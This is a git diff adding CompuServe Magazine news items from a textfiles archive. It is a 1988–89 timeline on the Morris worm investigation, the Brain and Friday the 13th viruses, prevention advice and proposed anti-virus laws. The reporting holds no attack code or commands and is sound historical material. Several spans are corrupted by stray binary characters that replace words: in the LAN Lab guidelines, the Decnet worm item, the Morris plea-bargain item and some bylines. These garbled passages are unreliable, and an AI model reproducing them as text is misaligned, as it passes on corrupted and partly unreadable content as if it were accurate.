security programming in Unix systems, +told science writer Celia Hooper of United Press International that he had "no +direct information" on his son's involvement. He added he had not spoken to his +son in several days and was unaware of his whereabouts. + The elder Morris also told The Times that the virus "has raised the public +awareness to a considerable degree. It is likely to make people more careful and +more attentive to vulnerabilities in the future." + As reported here yesterday (GO OLT-391), the incident, in which thousands of +networked computers at universities and research and military installations were +halted or slowed, is said to be the largest assault ever on the nation's +computers. However, no permanent damage or security breaches appear to have +occurred during the attack. + Of Morris Jr.'s alleged involvement, Cornell Vice President M. Stuart Lynn +released a statement late last night saying the Ithaca, N.Y., university has +uncovered some evidence. For instance, "We are investigating the (computer +files) to see if the virus was inserted in the system at Cornell. So far, we +have determined that this particular student's account does hold files that +appear to have passwords for some computers at Cornell and Stanford University +to which he's not entitled. + "We also found that his account contains a list of passwords substantially +similar to those contained in the virus," said Lynn. He added that students' +accounts show which computers they had accessed and what they had stored. The +university is preserving all pertinent computer tapes and records to determine +the history of the virus. + Morris Jr. himself has not been reached for comment. Associated Press writer +Douglas Rowe says the young man is believed to have flown to Washington, D.C., +yesterday and plans to hire a lawyer and to meet with officials in charge of the +infected computer networks to discuss the incident. + Rowe also quotes computer scientists as saying the younger Morris worked in +recent summers at the AT&T's Bell Laboratories, where one of his projects +reportedly was rewriting the communications security software for most computers +that run AT&T's Unix operating system. + AP also notes that computer scientists who now are disassembling the virus to +learn how it worked said they have been impressed with its power and cleverness. + Of this, Morris' 56-year-old father told the Times that the virus may have +been "the work of a bored graduate student." + Rowe says that when this comment was heard back at Cornell, Dexter Kozen, +graduate faculty representative in the computer science department, chuckled and +said, "We try to keep them from getting bored. I guess we didn't try hard +enough." + Meanwhile, there already is talk of repercussions if Morris is determined to +be responsible for the virus. + Lynn said, "We certainly at Cornell deplore any action that disrupts computer +networks and computer systems whether or not it was designed to do so. And +certainly if we find a member of the Cornell community was involved, we will +take appropriate disciplinary action." He declined to specify what the action +would be. + In addition, federal authorities may be calling. Speaking with reporter Joseph +Verrengia of Denver's Rocky Mountain News late yesterday, FBI spokesman William +Carter said a criminal investigation would be launched if it is determined +federal law was violated. He said the bureau will review the Computer Fraud and +Abuse Act, which deals with unauthorized access to government computers or +computers in two or more states. Conviction carries a maximum penalty of 10 +years in prison. + --Charles Bowen + + +ROBERT MORRIS' FRIENDS SAY NO MALICE MEANT WITH ALLEGED VIRUS + + (Nov. 7) + Friends of a Cornell University graduate student suspected of creating a +"virus" that jammed some 6,000 networked computers for 36 hours last week say +they believe he intended no malice and that he also frantically tried to warn +operators after he saw his programming experiment had gone terribly awry. + Twenty-three-year-old Robert Tappen Morris Jr. is said to now be in contact +with his father -- Robert T. Morris Sr., a computer security expert with the +super secret National Security Agency - - and is expected to meet this week with +FBI agents after hiring a lawyer. + As reported earlier, the virus, which started Wednesday night, spread along +several major networks and, for about 36 hours, created widespread disturbances +in the unclassified branch of the military's defense data system, as well as in +thousands of university and research computer systems. However, apparently no +information was lost or damaged. + Morris Sr. told Associated Press writer David Germain that he met with FBI +agents for about an hour Saturday to explain why his son will not immediately +comply with their request for more information. The elder Morris said the family +has had preliminary discussions with an attorney and expects to hire one by +today. He said his son won't be available for a comment until at least tomorrow +or Wednesday. + The New York Times yesterday quoted Morris' friends as saying he had spent +weeks creating the virus. However, the paper said that by all accounts Morris +meant no harm to the systems; instead, the virus, created as an intellectual +challenge, was supposed to lie dormant in the systems. + A friend alleges Morris discovered a flaw in the electronic mail section of +the Unix 4.3 operating system, a modification of AT&T's original Unix produced +by the University of California at Berkeley. When he saw the flaw allowed him to +secretly enter the networked Unix computers, Morris literally jumped onto the +friend's desk and paced around on top of it, the Times reported. + Cornell instructor Dexter Kozen told AP the flaw was "a gaping hole in the +system that I'm amazed no one exploited before." While the loophole was not +evident before the virus was unleashed, "in retrospect it's really quite +obvious," Kozen said. + Incidentally, the programmer who designed Unix's e-mail program through which +the virus apparently entered told the Times this weekend that he had forgotten +to close a secret "back door." Eric Allman said he created the opening to make +adjustments to the program, but forgot to remove the entry point before the +program was widely distributed in 1985. He was working for a programming +organization at the University of California/Berkeley at the time. + Friends and others say Morris' original vision was to spread a tiny program +throughout and have it secretly take up residence in the memory of each computer +it entered, the Times said. + Working virtually around the clock, Morris reportedly made a single +programming error involving one number that ultimately jammed more than 6,000 +computers by repeating messages time after time. + AP's Germain said Morris reportedly went to dinner after setting the program +loose Wednesday night and then checked it again before going to bed. Discovering +his mistake, Morris desperately worked to find a way to stop the virus' spread. + However, "his machines at Cornell were so badly clogged he couldn't get the +message out," said Mark Friedell, an assistant professor of computer science at +Harvard University, where Morris did his undergraduate studies. + AP says that, panicked, Morris called Andrew Sudduth, systems manager at +Harvard's Aiken Laboratory. He asked Sudduth to send urgent messages to a +computer bulletin board system, explaining how to defeat the virus. + Sudduth told The Washington Post, "The nets were like molasses. It took me +more than an hour to get anything out at all." + At a press conference this weekend, Cornell University officials said that, +while the computer virus was traced to their institution, they actually had no +evidence to positively identify Morris as the virus creator. + Said Dean Krafft, Cornell's computer facilities manager, "We have no +fingerprints. We have no eyewitness, but it was created on his computer +account." Krafft added that Morris' computer account holds files that appear to +have unauthorized passwords for computers at Cornell and Stanford University. + In addition, Cornell Vice President M. Stuart Lynn said the origin of the +program is hard to investigate, and it may be impossible to trace the virus back +to Morris. "At this stage we're simply not in a position to determine if the +allegations are true," Lynn said, adding he did not know how long the +investigation would take. + Curiously, in light of Krafft's statements, Lynn is quoted as saying, "It's +quite conceivable we may not be able to say with any certainty" if the virus was +created in Cornell's computer system. + Lynn also said the university had been contacted by the FBI, but there was no +indication any criminal charges would be filed. Officials said the school could +discipline Morris if he was involved. + By the way, one Cornell official, who spoke on condition of anonymity, told AP +that it appeared there was an earlier version of the virus in Morris' computer +files. + Regarding possible penalties, United Press International this morning quoted +an FBI spokesman as saying that the person responsible for the virus could face +up to 20 years in prison and $250,000 in fines for the federal offense of +unauthorized access to government computers. + Finally, Harvard graduate student Paul Graham, a friend of Morris, told the +Times he thought Morris' exploit was similar to that of Mathias Rust, the young +West German who flew a light plane through Soviet air defenses in May 1987 and +landed in Moscow. + "It's as if Mathias Rust had not just flown into Red Square, but built himself +a stealth bomber by hand and then flown into Red Square." + --Charles Bowen + + + +NEW LAN LABORATORY GROUP OFFERS SUGGESTIONS FOR VIRUS PREVENTION + + (Nov. 7) + Just a week or so before thousands of networked computers across the country +were struck by a rapid virus, some 60 computer companies endorsed a set of +virus-prevention guidelines drafted by the National LAN Laboratory. + The Reston, Va., group, devoted to local area networks, hopes its tips can +prevent and control future viruses and worm program intrusions. + Speaking with business writer Peter Coy of The Associated Press, LAN Lab +spokesman Delbert Jones said, "The key issue is that with proper precautions, +one can continue to live a normal existence. ... "It's very much like the AIDS +virus: The best solution is precaution." + Here, according to AP, are the suggestions by the LAN Lab group: + 1. All software should be purchased from known, reputable sources. + 2. Purchased software should be in its original shrink wrap or sealed disk +containers when received. + 3. Back-up copies should be made as soon as the software package is opened. +Back-ups should be stored off-site. + 4. All software should be reviewed carefully by a system manager before it is +installed on a network. + 6. New software should be quarantined on an isolated computer. This testing +will greatly reduce the risk of system virus contamination. + 7. A back-up of all system software and data should be made at least once a +month, with the back-up copy stored for at least one year before re-use. This +will allow restoration of a system that has been contaminated by a +"time-released" virus. A plan that includes "grandfathered" rotation of back-up +copies will reduce risk even further. + 8. System administrators should restrict access to system programs and data on +"needmSkͥ͹a isolte!pKͱ protects critZX +ѥͱ +and aids problem diagnosis. + 9. All programs on a system should be checked regularly for program length +changes. Any program-length deviations could be evidence of tampering, or virus +infiltration. + 10. Many shared or free programs are invaluable. However, these are the prime +entry point for viruses. Skeptical review of such programs is prudent. Also, +extended quarantine is essential before these programs are introduced to a +computer system. + 11. Any software that exhibits symptoms of possible virus contamination should +be removed immediately. System managers should develop plans for quick removal +of all copies of a suspect program, and immediate backup of all related data. +These plans should be made known to all users, and tested and reviewed +periodicalQ#jjŹBowen + + +FBI UPGRADES VIRUS PROBE TO A "FULL CRIMINAL INVESTIGATION" + + (Nov. 8) + The young man alleged to have written the virus that stymied some 6,000 +networked computers last week has hired a Washington, D.C., attorney. His +selection apparently comes just in time, because the FBI reportedly is upgrading +its probe of the matter to a full criminal investigation. + Robert T. Morris Jr., 23-year- old Cornell University graduate student, has +not been formally charged, but nonetheless is widely alleged to have created the +virus that played havoc for 36 hours last week with Unix- based computers on the +Pentagon-backed ARPANET network and other systems. + Associated Press writer Anne Buckley this morning reported that lawyer Thomas +Guidoboni of the Washington firm of Bonner & O'Connell has been retained to +represent Morris. Guidoboni told Buckley, "We have notified the federal +authorities of our representation and (Morris') whereabouts. We are in the +process of investigating the facts and circumstances which have been reported by +the press in order to determine our course of action." + Meanwhile, The Washington Post this morning quoted law enforcement sources as +confirming their inquiry has been expanded to a full field investigation by the +FBI's Washington field office. That means the FBI has consulted with federal +prosecutors, agreed that the bureau has jurisdiction and that there is reason to +believe there may have been a violationot federal criminal law. + "In a full-scale investigation," Buckley said, "the government has the power +to subpoena records and documents and compel testimony through the authorization +of immunity, two techniques which are not permitted through preliminary +inquiries. The move indicate(s) the FBI (is) moving very quickly in the case +because in many instances, preliminary inquiries take a month or more." + AP also quoted a government source who spoke on condition of anonymity as +saying investigators aren't sure whether any criminal activity actually +occurred, as defined by a statute passed in 1984. + Says Buckley, "A section of that law says it is unlawful to enter a government +computer with the intent to disrupt its functions. The crime is punishable by up +to 10 years in prison. The source said that in this case, there's no evidence +that anything was taken from the computers, but rather that it was a question of +disrupting computer systems. One section of law addresses sabotage, but the +source said it (is) unclear whether the virus case would involve an intent to +disrupt the computer." + AP says its source believes the bureau is investigating the matter in view of +the fact that there were breaches of security, and that the Justice Department +will have to determine whether the matter involved criminal conduct. + --Charles Bowen + + + +GOVERNMENT MAY SUBPOENA CORNELL + + (Nov. 9) + Sources close to the investigation of last week's massive virus attack say the +government may seek search warrants or subpoenas to get documents from Cornell +University before trying to interview the virus's alleged author. + AssoCiYYɕ́writer Pete Yost quotes Washington, D.C., lawyer Thomas +Guidoboni as saying he hasn't been contacted by the FBI since informing the +bureau that he was chosen on Monday to represent the suspect, 23-year-old Robert +T. Morris Jr., a Cornell graduate student. + Says Guidoboni, "The ball's in their court. We're waiting to hear from them." + Yost notes that earlier the FBI had sought to question Morris, but that was +before Guidoboni was retained. The lawyer told AP he didn't think "we'll have +enough information by the end of this week" to determine whether to talk to the +FBI. He says he wants to talk more with his client before deciding what course +to take. + Says the wire service, "The possibility of seeking grand jury subpoenas or a +search warrant for data at Cornell that could shed light on the computer virus +incident was considered (yesterday) within the FBI. It was discarded as being +unnecessary and then revived in discussions with Justice Department lawyers, +said the sources, speaking on condition of anonymity." + Meanwhile, Cornell Vice President M. Stuart Lynn reiterated that the +university will cooperate fully with the investigation. + Morris, son of acclaimed computer security expert Robert Morris Sr. of Arnold, +Va., has not been formally charged. Still, he is widely alleged to be the person +who created the virus that paralyzed some 6,000 networked Unix-based computers +on the Pentagon-backed ARPANET network and other systems for about 36 hours last +week. + --Charles Bowen + + + +"BRAIN VIRUS" APPEARS IN HOUSTON + + (Nov. 9) + A version of the so-called "Brain virus," a rogue program believed to have +originated in Pakistan, now has cropped up in computers used by University of +Houston business students. Texas officials say that the virus, while a nuisance, +has posed no real problem. + University research director Michael Walters told The Associated Press, "It +probably hasn't cost us much, except a few days of people-time to clean up these +disks, but it probably cost the students a good bit of frustration." + Some students report they have lost data, but Walters told the wire service he +knows of no one who has lost an entire term paper or other large quantity of +work. Nonetheless, reports still were coming in from students late yesterday. + This version of the Brain virus, which last spring was traced to a computer +store in Lahore, Pakistan, announced itself at the university early last week on +the screen of one of the 150 PCs the business department has for students and +faculty. Walters said the virus hasn't spread to the school's larger computers. + AP quotes Walters as saying the virus flashed this message (with these +misspellings) to students who tried to use infected programs: + "Welcome to the dungeon. Copyright 1968 Brain & Amjads, PVT, LTD. Virus shoe +record V9.0. Dedicated to the dynamic memory of millions of virus who are no +longer with us today -- Thank Goodness. BEWARE OF THE VIRUS. This program is +catching. Program follows after these messeges." + The original "Brain" virus -- which appeared in May at colleges and businesses +along the East Coast and in the computers of The Providence, R.I., +Journal-Bulletin newspaper -- flashed the "Welcome to the Dungeon" message, but +added "Contact us for vaccination." It also gave names, an address and a phone +number of two brothers who run a Lahore, Pakistan, computer store. + Walters said the Houston version of the virus says nothing about any vaccine, +and the "V9.0" in its message suggests it may be a modified version. + Before this, the most recent sighting of the "Brain" virus was at Business +International, a Hong Kong financial operation. It was thought to be the first +reported digital infection of a commercial business in the East. The firm is +believed not to have suffered any major damage. + --Charles Bowen + + + +UNIX EXPERT SAYS VIRUS "PANIC" UNNECESSARY, BLAMES BAD PLANNING + + (Nov. 10) + An expert on the Unix operating system says that much of last week's "panic" +over the virus that brought down some 6,000 networked computers was caused by +poor management technique. + In a statement from his Rescue, Calif., offices, newsletter editor Bruce +Hunter said, "Most of the damage was done by the organizations themselves, not +the virus." + Hunter, who edits Root, a bimonthly Unix administration and management journal +published by InfoPro Systems, observed that more than 50,000 users were +reportedly cut off at a single site due to last week's virus, and that more than +a million people are believed to have been directly affected. + However, Hunter said, "By dropping network connections, administrators were +ensuring that the virus was winning. Good communications and information sharing +between administrators is what helped people on the network find and implement a +solution to the virus quickly." + Hunter, who also is an author and mainframe Unix system manager, said that one +job of an administrator is to keep all system resources available to users, and +another is to "go around searching for possible trouble." + He said the most important lesson learned from last week's virus was that a +definite plan is imperative to avoid inappropriate reactions. + Hunter made these suggestions to managers: + -:- Develop a set of scenarios and responses for future virus attacks as well +as physical disasters. + -:- Keep a printed list of system administrators at all company sites. + -:- Establish a central point of information. + -:- Coordinate an emergency response task force of key personnel. + -:- Keep current off-site backups of all data. + -:- Perform regular security audits. + --Charles Bowen + + + +FBI LOOKING AT WIDE RANGE OF POSSIBLE VIOLATIONS IN VIRUS CASE + + (Nov. 10) + The FBI now is looking at a wide range of possible federal violations in +connection with last week's massive computer virus incident, ranging beyond the +bureau's original focus on the provisions of the Computer Fraud and Abuse Act of +1986. + That was the word today from FBI Director William Sessions, who told a news +conference in Washington that the FBI is trying to determine whether statutes +concerning wire fraud, malicious mischief or unlawful access to stored +communications may have been broken. + The Associated Press notes that earlier the FBI had said it was concentrating +on the 1986 Computer Fraud and Abuse Act, which prohibits fraud or related +activity in connection with computers. + The FBI chief said, "We often look at intent as being knowing and intentional +doing of an act which the law forbids and knowing that the law forbids it to be +done. But we also have other statutes which deal simply with knowingly doing +something." + The wire service observed the following about two statutes to which Sessions +referred: + -:- The malicious mischief statute provides a maximum 10-year prison term for +anyone who wilfully interferes with the use of any communications line +controlled by the US government. + -:- The unlawful access law makes it a crime to prevent authorized access to +electronic communications while they are in electronic storage and carries a +maximum six-month jail term absent malicious destruction or damage. + Sessions also told reporters the preliminary phase of the bureau's criminal +investigation probably will be completed in the next two weeks. + As reported here earlier, authorities think 23-year-old Cornell University +student Robert T. Morris created the virus that disrupted thousands of networked +computers last week. However, Morris has not yet been charged with any crime. + --Charles Bowen + + + +MICHIGAN WEIGHS ANTI-VIRUS LAW + + (Nov. 15) + Michigan lawmakers soon will consider a proposed state law that would impose +felony penalties against anyone convicted of creating or spreading computer +"viruses." + Sponsoring the bill, Republican Sen. Vern Ehlers told United Press +International, "Because this is a new type of crime, it is essential we address +it directly with a law that deals with the unique nature of computers." + Citing this month's virus attack on military and research computers linked by +ARPANET and other networks, Ehlers added, "The country recently saw how quickly +a virus can spread through network users. The Defense Department and its +contractors were extremely fortunate that the virus was relatively harmless." + The senator said his bill, still being drafted, is expected to include +provisions making it a felony for anyone to deliberately introduce a virus into +a computer system. + UPI notes Ehlers is a physicist with a Ph.D who has 30 years' experience with +computers. + --Charles Bowen + + + +VIRUS STRIKES CALIF. MACINTOSHES + + (Nov. 15) + Students at Southern California universities were being warned today of a +rapidly spreading West German virus that reportedly is disrupting functions of +Apple Macintosh computers. + "In general, this thing is spreading like mad," Chris Sales, computer center +consultant at California State University at Northridge, told The Associated +Press. "It originated in West Germany, found its way to UCLA and in a short time +infected us here." + AP quotes school officials as saying that at least a dozen Macs at the +suburban San Fernando Valley campus have been infected since the virus first +cropped up last week. Cal State says the virus apparently does not erase data, +but that it does stall the computers and removal requires hours of +reprogramming. + The wire service said students' disks are "being tested for the virus" before +they can rent a Mac0a the`+˕ͥ偽ѽɕj +@"--CarlY.ݕ5 + + + +COMPUTER SECURITY EXPERT OFFERS TIPS + + (Nov. 15) + The need to protect against computer viruses has heralded the end of the +user-friendly computer era, says one security expert. + According to Government Computer News, Sanford Sherizen, president of Data +Security Systems Inc. of Natick, Mass. said the objective now is to make +software bullet-proof, not accessible. + He said that since the advent of computers in offices, managers have been +faced with the conflicting needs of protecting the data versus producing it. +Data must be accessible to those who need it and yet at the same time secure +from those who can alter, delete, destroy, disclose or steal it or steal +computm!hardware. + Sherizen told GCN reporter Richard A. Danca that non- technical managers can +contribute to computer security as advocates and facilitators. Users must learn +that security is a part of their jobs. + He predicted that security managers will soon use biometric security measures +such as comparing retinal blood vessels or fingerprints. Needless to say, such +techniques raise complicated issues of civil liberties and privacy. + Sherizen said that all information deserves protection. + --Cathryn Conroy + + + +VIRUS THREAT SAID EXAGGERATED + + (Nov. 16) + Because of the latest reports of attacks by computer "viruses," some in the +industry are ready to blame such rogue programs for anything that goes wrong. + However, expert Charles Wood told a 15th annual computer security conference +in Miami Beach, Fla., this week, "Out of over 1,400 complaints to the Software +Service Bureau this year, in only 2 percent of the cases was an electronic virus +the cause of the problem. People are jumping to the conclusion that whenever a +system slows down, it's a virus that's responsible." + The Associated Press reports that Wood and other panelists cautioned that +computer-dependent companies should focus more on the day-to-day breakdowns +caused by human error than on viruses. + President Steve Irwin of LeeMah Datacom Security Corp. told the conference +that this month's virus assault on networked computers on the ARPANET system +"could be a cheap lesson." + Said Irwin, "We were lucky because it was not a real malicious attempt ... If +(the virus' author) had ordered the programs to be erased, the loss could have +gone into billions, lots of zeroes." + AP quoted Wood as adding, "The virus is the hot topic right now, but actually +the real important subject is disaster recovery planning. But that's not as +glamorous as the viruses." + --Charles Bowen + + +FBI SEIZES MORRIS RECORDS IN PROBE OF NATIONAL VIRUS CASE + + (Nov. 17) + While young Robert T. Morris Jr. still has not been charged with anything in +connection with the nation's largest computer virus case, the FBI now reveals +that items it has seized so far in its probe include magnetic tapes from Morris' +computer account at Cornell University. + The Associated Press reports that documents released by the FBI late yesterday +say investigators seized "two magnetic tapes labeled `files from Morris account +including backups' and hard copy related thereto" from Dean Krafft, a research +associate in computer science at Cornell, where the 23- year-old Morris is a +graduate student. + AP says the agents also obtained "two yellow legal pads with calculus and +assorted notes." Associate university counsel Thomas Santoro had taken the legal +pads from an office in Upson Hall, a campus building that contains computer +science classrooms and offices, AP says. + Even though Morris hasn't been charged, it has been widely reported that the +young man told friends he created the virus tHa stymied an estimated 6,200 +Unix- based computers on ARPANET and other networks for some 36 hours earlier +this month. + As reported, the FBI is conducting a criminal investigation to determine +whether statutes concerning wire fraud, malicious mischief or unlawful access to +stored communications may have been violated. + AP quotes these latest FBI documents as saying that US District Judge Gustave +J. DiBianco in the northern district of New York in Syracuse issued two warrants +on Nov. 10 for the Cornell searches. The FBI searches were conducted that same +afternoon. + "The government had said earlier that it might try to obtain documents from +the university before interviewing Morris," AP observes, "and Cornell's vice +president for information technologies, M. Stuart Lynn, had said the university +would cooperate fully with the investigation." + --Charles Bowen + + +SPA FORMS GROUP TO KNOCK DOWN RUMORS ABOUT COMPUTER VIRUSES + + (Nov. 17) + Upset over wild rumors about the destructiveness of computer viruses, the +Software Publisher Association has formed a special interest group to address +computer security. + In a statement released today at the Comdex trade show in Las Vegas, SPA says +its new Software Security SIG will help distribute information and serve as +liaison for software publishers, industry analysts and consultants. + McGraw-Hill News quotes SPA member Ross Greenberg, president of Software +Concepts Design, as saying, "Recent unsubstantiated statements regarding the +actual damage caused by viruses...has caused more of XՉfervor than served +as a public service." + At the SIG's organizational meeting, several companies discussed setting +standards on how to educate the public regarding viruses and various anti-viral +products now being advertised. + --Charles Bowen + + \ No newline at end of file diff --git a/textfiles.com/virus/csvir89.vir b/textfiles.com/virus/csvir89.vir new file mode 100644 index 00000000..8af421d5 --- /dev/null +++ b/textfiles.com/virus/csvir89.vir @@ -0,0 +1,1235 @@ +The following text is copyright (c) 1987-1990 CompuServe Magazine +and may not be reproduced without the express written permission of CompuServe. + +CompuServe Magazine's Virus History Timeline + +CompuServe Magazine is published monthly by the CompuServe Information +Service, the world's largest on-line information service with over 600,000 +subscribers worldwide. + +If you would like to become a CompuServe subscriber, call +1-800-848-8199 to receive a copy of the CompuServe Information Service +membership kit. + + +- 1989 - + + +VIRUS STRIKES UNIVERSITY OF OKLA. + + (Jan. 11) + Officials at the University of Oklahoma in Norman, Okla., blame a computer +virus for ruining several students' papers and shutting down terminals and +printers in a student lab at the university library. + Manager Donald Hudson of Bizzell Memorial Library told The Associated Press +that officials have purged the library computers of the virus. He said the +library also has set up extra computers at its lab entrance to inspect students' +programs for viruses before they are used on other computers. + The wire service said the library's virus probably got into a computer through +a student's disk, but the student may not have known the virus was there. Hudson +said the library's computers are not linked to any off-campus systems. However, +the computers are connected through printers, which he said allowed the virus to +spread. + --Charles Bowen + + +"FRIDAY THE 13TH" VIRUS STRIKES + + (Jan. 13) + Data files and programs on personal computers throughout Britain apparently +were destroyed today by what was termed a "Friday the 13th" computer virus. + Alan Solomon, managing director of S and S Enterprises, a British data +recovery center, told The Associated Press that hundreds of users of IBM and +compatible PCs reported the virus, which he said might be a new species. + Solomon, who also is chairman of an IBM users group, told the wire service +that phone lines to the center were busy with calls for help from businesses and +individuals whose computers were struck by the virus. + "It has been frisky," he said, "and hundreds of people, including a large firm +with over 400 computers, have telephoned with their problems." + S and S hopes to figure out how the virus operates and then attempt to disable +it. "The important thing is not to panic and start trying to delete everything +in a bid to remove the virus," Solomon said. "It is just a pesky nuisance and is +causing a lot of problems today." + --Charles Bowen + + +"FRIDAY THE 13TH" VIRUS MAY BE NEW VERSION OF ONE FROM ISRAEL + + (Jan. 14) + Investigators think the "Friday the 13th" virus that struck Britain yesterday +might be a new version of the one that stymied computers at the Hebrew +University in Jerusalem on another Friday the 13th last May. + As reported here yesterday (GO OLT-308), hundreds of British IBM PCs and +compatibles were struck by the virus, which garbled data and deleted files. + Jonathan Randal of The Washington Post Foreign Service reports the program is +being called the "1,813" variety, because of the number of unwanted bytes it +adds to infected software. + He says the specialists are convinced the program "is the brainchild of a +mischievous -- and undetected -- computer hacker at Hebrew University." + Alan Solomon, who runs the IBM Personal Computer User Group near London, told +the Post wire service that 1,813 was relatively benign, "very minor, just a +nuisance or a practical joke." + Solomon said he and other specialists first noted the virus in Britain several +months ago when it began infecting computers. Solomon's group wrote security +software with it distributed free, so, he said, the virus basically struck only +the unlucky users who didn't take precautions. + --Charles Bowen + + + +LIBRARY OF CONGRESS VIRUS VICTIM + + (Jan. 27) + An official with the US Library of Congress acknowledges that the institution +was struck by a computer virus last fall. + Speaking to a delegation of Japanese computer specialists touring Washington, +D.C., yesterday, Glenn McLoughlin of the library's Congressional Research +Service disclosed that a virus was spotted and killed out of the main catalog +computer system before it could inflict any damage to data files. + Associated Press writer Barton Reppert quoted McLoughlin as saying, "It was +identified before it could spread or permanently erase any data." + McLoughlin added the virus was found after personnel logged onto computers at +the library and noticed they had substantially less memory space to work with +than they had expected. + He said the virus apparently entered the system through software obtained from +the University of Maryland. "We don't know," he said, "whether it was a student +at Maryland, or whether Maryland had gotten it from somebody else. That was +simply the latest point of departure for the software." + Meanwhile, Reppert also quoted computer security specialist Lance J. Hoffman +of George Washington University as saying the world may be heading toward a +catastrophic computer failure unless more effective measures are taken to combat +viruses. + Comparing last November's virus assault on the Pentagon's ARPANET network to a +nuclear accident that "could have had very disastrous consequences for our +society," Hoffman told the visitors, "It wasn't Chernobyl yet, it was the Three +Mile Island -- it woke a lot of people up." + Online Today has been following reports of viruses for more than a year now. +For background files, type GO OLT-2039 at any prompt. And for other stories from +The Associated Press, type GO APO. + --Charles Bowen + + + +CHRISTMAS VIRUS FROM FRANCE? + + (Jan 30) + A little noticed software worm, the so-called Christmas Decnet virus, may +have originated from Germany or France. Apparently released at the end of +December, the worm replicated itself only onto Digital Equipment Corp. computers +that were connected to Decnet, a national communications network often accessed +by DEC users. + At least one system administrator has noticed that the worm collected +identifying information from the invaded terminals and electronically mailed +that information to a nedwrk`J2ancen Te assmptZJ́that the French +node collected the information and, subsequently, used it to propagate the worm +throughout the network. + The so-called German connection came about because of the way the worm +presents text information on invaded terminals. Though written in English, the +worm message is said to contain strong indications of Germanic language syntax. +Predictably, a German "connection" has led to speculation that Germany's Chaos +Computer Club may have had a role in worm's creation. + --James Moran + + + +SPLIT SEEN ON HOW TO PROSECUTE MAN ACCUSED OF ARPANET VIRUS + + (Feb. 2) + Authorities apparently are divided over how to prosecute Robert T. Morris Jr., +the 23- year-old Cornell University graduate student suspected of creating the +virus that stymied the national Arpanet computer network last year. + The New York Times reports today these two positions at issue: + -:- US Attorney Frederick J. Scullin in Syracuse, N.Y., wants to offer Morris +a plea bargain to a misdemeanor charge in exchange for information he could +provide. Scullin reportedly already has granted Morris limited immunity in the +case. + -:- Some in the US Justice Department want Morris charged with a felony in +hopes of deterring similar computer attacks by others. They are angry over +Morris's receiving limited immunity. + Confirming a report in The Times, a source who spoke on condition of anonymity +told Associated Press writer Carolyn Skorneck the idea of granting Morris +limited immunity has "caused a lot of consternation down here." + Skorneck notes the 1986 Computer Fraud and Abuse Act makes unlawful access to +a government computer punishable by up to a year in jail and a $250,000 fine. If +fraud is proved, the term can reach 20 years in prison. + The source told AP, "As far as we're concerned, the legal problem was still +(Morris's) intent." In other words, officials apparently are uncertain whether +Morris had planned to create and spread the virus that infected some 6,000 +government computers on the network last Nov. 2. + As reported earlier, Morris allegedly told friends he created the virus but +that he didn't intend for it to invade the Unix- based computers linked to +Arpanet. + Skorneck says Mark M. Richard, the Justice Department official who is +considering what charges should be brought in the case, referred questions to +the FBI, which, in turn, declined to discuss the case because it is an ongoing +investigation. + 0Hweverl S۷]֭ -said he understood the FBI was extremely upset over +the limited immunity granted to Morris. + Meanwhile, Morris's attorney, Thomas Guidoboni of Washington, D.C., said no +plea bargain had been worked out, "They have not told me," he said, "what +they've recommended, and I've not offered on behalf of my client to plead guilty +to anything. I have told p(Y[Wt plead guilty to a felony. I'm very +emphatic about that." + --Charles Bowen + + + +FEDERAL GROUP FIGHTS VIRUSES + + (Feb. 3) + The Computer Emergency Response Team (CERT) has been formed by the Department +of Defense and hopes to find volunteer computer experts who will help federal +agencies fight computer viruses. CERT's group of UNIX experts are expected to +help users when they encounter network problems brought on by worms or viruses. + A temporary group that was formed last year after Robert T. Morris Jr. +apparently let loose a bug that infected the Department of Defense's Advanced +Project Agency network (ARPANET), will be disbanded. + The Morris case has some confusing aspects in that some computer groups have +accused federal prosecutors with reacting hysterically to the ARPANET infection. +It has been pointed out that the so-called Morris infection was not a virus, and +that evidence indicates it was released onto the federal network accidentally. + CERT is looking toward ARPANET members to supply its volunteers. Among those +users are federal agencies, the Software Engineering Institute and a number of +federally-funded learning institutions. Additional information is available from +CERT at 412/268- 7090. + --James Moran + + + +COMPUTER VIRUSES HOT ISSUE IN CONGRESS + + (Feb. 3) + One of the hottest high-tech issues on Capitol Hill is stemming the plague of +computer viruses. + According to Government Computer News, Rep. Wally Herger (R-Calif.) has +pledged to reintroduce a computer virus bill that failed to pass before the +100th Congress adjourned this past fall. The measure will create penalties for +people who inject viruses into computer systems. + "Unfortunately, federal penalties for those who plant these deadly programs do +not currently exist," said Herger. "As a result, experts agree that there is +little reason for a hacker to even think twice about planting a virus." (Herger +then later corrected himself saying those who plant viruses are not hackers but +rather criminals.) + GCN notes that the bill calls for prison sentences of up to 10 years and +extensive fines for anyone convicted of spreading a computer virus. It would +also allow for civil suits so people and businesses could seek reimbursement for +system damage caused by a virus attack. + If the bill is referred to the Judiciary Committee, as is likely, it stands a +reasonable chance of passage. Rep. Jack Brooks, a longtime technology +supporter, is the new head of that committee and he has already stated that the +new position will not dampen his high-tech interests. + -- Cathryn Conroy CONGRESS LOOKS AT ANOTHER COMPUTER PROTECTION BILL + + (Feb. 27) + The Computer Protection Act (HR 287) is the latest attempt by Congress to +battle computer viruses and other forms of sabotage on the high-tech machines. + Introduced by Rep. Tom McMillan (D-Md.), the bill calls for a maximum of 15 +years in prison with fines of $100,000 to $250,000 for those convicted of +tampering with a computer, be it hardware or software. + "With the proliferation of various techniques to tamper with computers, we +need to fill the void in federal law to deal with these criminals," said +McMillan. "This legislation will send the clear signal that infiltrating +computers is not just a cute trick; it's against the law." + The bill, which has been referred to the Judiciary Committee, is written quite +broadly and is open to interpretation. + -- Cathryn Conroy + + + +VIRUS CREATOR FOUND DEAD I!39 + + (March 17) + A Californian who said he and one of his students created the first computer +virus seven years ago as an experiment has been found dead at 39 following an +apparent aneurysm of the brain. + Jim Hauser of San Luis Obispo died Sunday night or Monday morning, the local +Deputy Coroner, Ray Connelly, told The Associated Press. + Hauser once said he and a student developed the first virus in 1982, designing +it to give users a "guided tour" of an Apple II. He said that, while his own +program was harmless, he saw the potentially destructive capability of what he +termed an "electronic hitchhiker" that could attach itself to programs without +being detected and sneak into private systems. + --Charles Bowen + + + +HOSPITAL STRUCK BY COMPUTER VIRUS + + (March 22) + Data on two Apple Macintoshes used by a Michigan hospital was altered recently +by one or more computer viruses, at least one of which apparently traveled into +the system on a new hard disk that the institution bought. + In its latest edition, the prestigious New England Journal of Medicine quotes +a letter from a radiologist at William Beaumont Hospitals in Royal Oak, Mich., +that describes what happened when two viruses infected computers used to store +and re!d)nuclear scans that are taken to diagnose patients' diseases. + The radiologist, Dr. Jack E. Juni, said one of the viruses was relatively +benign, making 